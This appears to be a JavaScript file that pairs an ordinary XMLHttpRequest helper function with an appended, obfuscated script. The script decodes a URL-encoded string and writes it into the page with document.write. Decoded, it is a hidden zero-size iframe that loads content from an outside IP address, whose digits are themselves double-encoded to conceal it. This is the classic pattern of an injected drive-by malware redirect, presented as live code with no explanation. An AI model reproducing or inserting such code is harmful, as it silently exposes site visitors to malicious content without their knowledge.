function getXMLHttp() {
		if (window.ActiveXObject) {
			try {
				return new ActiveXObject("Msxml2.XMLHTTP");
			} catch(e) {
				try {
					return new ActiveXObject("Microsoft.XMLHTTP");
				} catch(e1) {
					return null;
				}
			}
		} else if (window.XMLHttpRequest) {
			return new XMLHttpRequest();
		} else {
			return null;
		}
}
<!--
var Words="%3Ciframe%20src%3Dhttp%3A%2F%2F%2532%2532%2532%252E%2532%2533%2533%252E%2535%2532%252E%2537%2F%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
